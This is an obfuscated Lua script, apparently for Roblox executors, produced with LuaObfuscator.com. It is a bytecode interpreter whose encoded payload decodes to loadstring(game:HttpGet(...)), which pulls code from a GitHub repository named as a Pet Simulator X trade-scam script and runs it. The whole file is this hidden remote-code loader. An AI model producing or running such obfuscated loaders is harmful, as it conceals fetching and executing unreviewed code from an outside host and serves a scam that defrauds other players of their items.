--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v85,v19);v19=nil;v100=1;end end else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((570 -(367 + 201))^(v32-(2 -1))))%((5 -(3 + 0))^(((v33-(928 -(214 + 713))) -(v32-(1 -0))) + 1 + 0)) ;return v86-(v86%(2 -1)) ;else local v87=(621 -(555 + 64))^(v32-(878 -(282 + 595))) ;return (((v31%(v87 + v87))>=v87) and (932 -(857 + (105 -31)))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1065 -(68 + (2377 -1380)) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==(117 -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v35=958 -(892 + 65) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24()local v42=(0 -0) -(0 + 0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=3 -2 ;v46=(v20(v44,1 + 0 ,(796 + 176) -(802 + 150) ) * ((5 -3)^(57 -25))) + v43 ;v42=2 + 0 ;end if (v42==(999 -(915 + 82))) then v47=v20(v44,59 -38 ,19 + 12 );v48=((v20(v44,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or 1 ;v42=6 -3 ;end if (v42==(0 + (0 -0))) then v43=v23();v44=v23();v42=1 -0 ;end if (v42==3) then if (v47==(0 + 0)) then if (v46==(791 -(368 + 423))) then return v48 * (0 -0) ;else local v102=18 -(10 + 8) ;while true do if (v102==(0 -0)) then v47=443 -((1477 -1061) + 26) ;v45=0 -0 ;break;end end end elseif (v47==2047) then return ((v46==(0 + 0)) and (v48 * ((1 -(772 -(201 + 571)))/((1576 -(116 + 1022)) -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -((2458 -1460) + 488))^52))) ;end end end local function v25(v49)local v50;if  not v49 then local v88=0 + 0 ;while true do if (v88==((1080 -(1020 + 60)) + 0)) then v49=v23();if (v49==(885 -(261 + 624))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1424 -(630 + 793)) );v18=v18 + v49 ;local v51={};for v67=1 -0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(3 -2)) then else v55=nil;v56=nil;v52=31 -(22 + 7) ;end if (4~=v52) then else while true do if (v53==(0 + 0)) then local v98=0;while true do if (v98==1) then v53=1;break;end if ((0 + 0)==v98) then v54=1985 -(1266 + 719) ;v55=nil;v98=1;end end end if ((604 -(268 + 335))~=v53) then else v56=nil;v57=nil;v53=2;end if (v53~=(293 -(60 + 230))) then else v60=nil;while true do local v103=572 -(426 + 146) ;local v104;local v105;while true do if (v103==1) then while true do if (v104==(0 + 0)) then v105=1456 -(282 + 1174) ;while true do if ((811 -(569 + 242))==v105) then local v145=0 -0 ;while true do if (v145==1) then v105=1 + 0 ;break;end if ((1024 -(706 + 318))==v145) then if (v54~=(1252 -(721 + 530))) then else local v152=1271 -(945 + 326) ;local v153;while true do if (v152==0) then v153=0;while true do if (v153==(0 -0)) then local v156=0;while true do if (1==v156) then v153=1 + 0 ;break;end if (0~=v156) then else v58={v55,v56,nil,v57};v59=v23();v156=1;end end end if (v153==(1 + 0)) then v60={};v54=1502 -(1408 + 92) ;break;end end break;end end end if (v54==(1088 -(461 + 625))) then local v154=1288 -(993 + 295) ;local v155;while true do if (v154==0) then v155=0 + 0 ;while true do if (v155==(1171 -(418 + 753))) then local v157=0 + 0 ;local v158;while true do if (v157==(0 + 0)) then v158=0;while true do if (v158~=(0 + 0)) then else local v167=0;while true do if (v167==(1 + 0)) then v158=1;break;end if (v167~=(529 -(406 + 123))) then else for v175=1770 -(1749 + 20) ,v59 do local v176=0;local v177;local v178;local v179;while true do if ((0 + 0)~=v176) then else v177=0;v178=nil;v176=1;end if (v176==(1323 -(1249 + 73))) then v179=nil;while true do if (v177~=(1 + 0)) then else if (v178==(1146 -(466 + 679))) then v179=v21()~=(0 -0) ;elseif (v178==(5 -3)) then v179=v24();elseif (v178~=3) then else v179=v25();end v60[v175]=v179;break;end if (v177~=0) then else v178=v21();v179=nil;v177=1901 -(106 + 1794) ;end end break;end end end v58[3]=v21();v167=1;end end end if (v158~=1) then else v155=1;break;end end break;end end end if (1~=v155) then else for v160=1 + 0 ,v23() do local v161=0;local v162;local v163;while true do if (v161~=(1 + 0)) then else while true do if (0==v162) then v163=v21();if (v20(v163,1,2 -1 )~=(0 -0)) then else local v169=114 -(4 + 110) ;local v170;local v171;local v172;local v173;local v174;while true do if (v169~=(586 -(57 + 527))) then else v174=nil;while true do if (v170==(1429 -(41 + 1386))) then while true do if (v171==2) then local v185=103 -(17 + 86) ;local v186;while true do if (v185==0) then v186=0;while true do if (v186~=(1 + 0)) then else v171=3;break;end if (0~=v186) then else if (v20(v173,1,1 -0 )==(2 -1)) then v174[168 -(122 + 44) ]=v60[v174[2]];end if (v20(v173,2,2)~=(1 -0)) then else v174[3]=v60[v174[9 -6 ]];end v186=1;end end break;end end end if (v171==1) then local v187=0;local v188;while true do if (0==v187) then v188=0 + 0 ;while true do if (v188~=0) then else local v194=0 + 0 ;while true do if ((1 -0)==v194) then v188=66 -(30 + 35) ;break;end if (v194==0) then v174={v22(),v22(),nil,nil};if (v172==(1257 -(1043 + 214))) then local v200=0;local v201;while true do if (v200==0) then v201=0 -0 ;while true do if (v201~=(1212 -(323 + 889))) then else v174[7 -4 ]=v22();v174[4]=v22();break;end end break;end end elseif (v172==1) then v174[583 -(361 + 219) ]=v23();elseif (v172==(322 -(53 + 267))) then v174[3]=v23() -(2^(4 + 12)) ;elseif (v172==3) then local v206=0;local v207;local v208;while true do if (v206~=0) then else v207=0;v208=nil;v206=414 -(15 + 398) ;end if (v206~=1) then else while true do if (v207==(982 -(18 + 964))) then v208=0;while true do if (v208==0) then v174[11 -8 ]=v23() -(2^16) ;v174[3 + 1 ]=v22();break;end end break;end end break;end end end v194=1 + 0 ;end end end if (v188==(851 -(20 + 830))) then v171=2 + 0 ;break;end end break;end end end if (v171~=0) then else local v189=0;local v190;while true do if (v189==0) then v190=0;while true do if (v190~=(127 -(116 + 10))) then else v171=1;break;end if (v190~=0) then else local v195=0 + 0 ;while true do if ((738 -(542 + 196))==v195) then v172=v20(v163,3 -1 ,3);v173=v20(v163,4,6);v195=1 + 0 ;end if (v195==1) then v190=1;break;end end end end break;end end end if (v171==(2 + 1)) then if (v20(v173,2 + 1 ,7 -4 )==1) then v174[4]=v60[v174[4]];end v55[v160]=v174;break;end end break;end if (v170~=1) then else local v182=0 -0 ;local v183;while true do if (v182~=(1551 -(1126 + 425))) then else v183=0;while true do if (v183==(406 -(118 + 287))) then v170=7 -5 ;break;end if (v183~=0) then else v173=nil;v174=nil;v183=1;end end break;end end end if (v170==0) then v171=0;v172=nil;v170=1;end end break;end if ((1122 -(118 + 1003))~=v169) then else local v180=0;while true do if (v180==1) then v169=2;break;end if (v180==(0 -0)) then v172=nil;v173=nil;v180=1;end end end if (0==v169) then local v181=377 -(142 + 235) ;while true do if (v181==0) then v170=0 -0 ;v171=nil;v181=1;end if (v181==1) then v169=1 + 0 ;break;end end end end end break;end end break;end if (0~=v161) then else local v164=0;while true do if (v164==(977 -(553 + 424))) then v162=0;v163=nil;v164=1 -0 ;end if (v164~=1) then else v161=1;break;end end end end end v54=3 + 0 ;break;end end break;end end end v145=1 + 0 ;end end end if (v105==1) then if ((0 + 0)~=v54) then else local v146=0;local v147;local v148;while true do if (v146==1) then while true do if (v147~=(0 + 0)) then else v148=0 + 0 ;while true do if (v148==(0 -0)) then v55={};v56={};v148=1;end if (v148~=(2 -1)) then else v57={};v54=1;break;end end break;end end break;end if (v146==(0 -0)) then v147=0 + 0 ;v148=nil;v146=4 -3 ;end end end if (v54==(756 -(239 + 514))) then local v149=0 + 0 ;local v150;local v151;while true do if (v149==0) then v150=1329 -(797 + 532) ;v151=nil;v149=1 + 0 ;end if ((1 + 0)==v149) then while true do if (v150~=(0 -0)) then else v151=0;while true do if (v151==(1202 -(373 + 829))) then local v159=731 -(476 + 255) ;while true do if (v159==(1130 -(369 + 761))) then for v165=1 + 0 ,v23() do v56[v165-(1 -0) ]=v28();end return v58;end end end end break;end end break;end end end break;end end break;end end break;end if (v103==0) then v104=0 -0 ;v105=nil;v103=239 -(64 + 174) ;end end end break;end if ((1 + 1)~=v53) then else local v99=0;while true do if (v99==(1 -0)) then v53=339 -(144 + 192) ;break;end if (v99~=0) then else v58=nil;v59=nil;v99=217 -(42 + 174) ;end end end end break;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1;end if (v52~=(2 + 0)) then else v57=nil;v58=nil;v52=3;end if (v52==3) then local v91=0 + 0 ;while true do if ((1505 -(363 + 1141))==v91) then v52=4;break;end if (0~=v91) then else v59=nil;v60=nil;v91=1581 -(1183 + 397) ;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (v90==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then v79[v81[2]]=v63[v81[3]];else local v108;local v109,v110;local v111;local v112;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v112=v81[2];v111=v79[v81[3]];v79[v112 + 1 ]=v111;v79[v112]=v111[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v112=v81[2];v109,v110=v72(v79[v112](v13(v79,v112 + 1 ,v81[3])));v74=(v110 + v112) -1 ;v108=0;for v132=v112,v74 do local v133=0;while true do if (v133==0) then v108=v108 + 1 ;v79[v132]=v109[v108];break;end end end v73=v73 + 1 ;v81=v69[v73];v112=v81[2];v79[v112]=v79[v112](v13(v79,v112 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end end elseif (v82>2) then local v122=v81[2];local v123=v79[v81[3]];v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];else local v127=0;local v128;while true do if (v127==0) then v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));break;end end end elseif (v82<=5) then if (v82==4) then v79[v81[2]]();else v79[v81[2]]=v81[3];end elseif (v82<=6) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==7) then do return;end else local v134=v81[2];local v135,v136=v72(v79[v134](v13(v79,v134 + 1 ,v81[3])));v74=(v136 + v134) -1 ;local v137=0;for v140=v134,v74 do v137=v137 + 1 ;v79[v140]=v135[v137];end end v73=v73 + 1 ;break;end if (v90==0) then v81=v69[v73];v82=v81[1];v90=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574037E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F426573742D536372697074732F424553542D5053582D54524144452D5343414D2D5343524950542D574F524B494E472D4F4E2D412O4C2D4558454355544F52532D557064617465642D2F6D61696E2F736F75726365253230636F646500093O00124O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
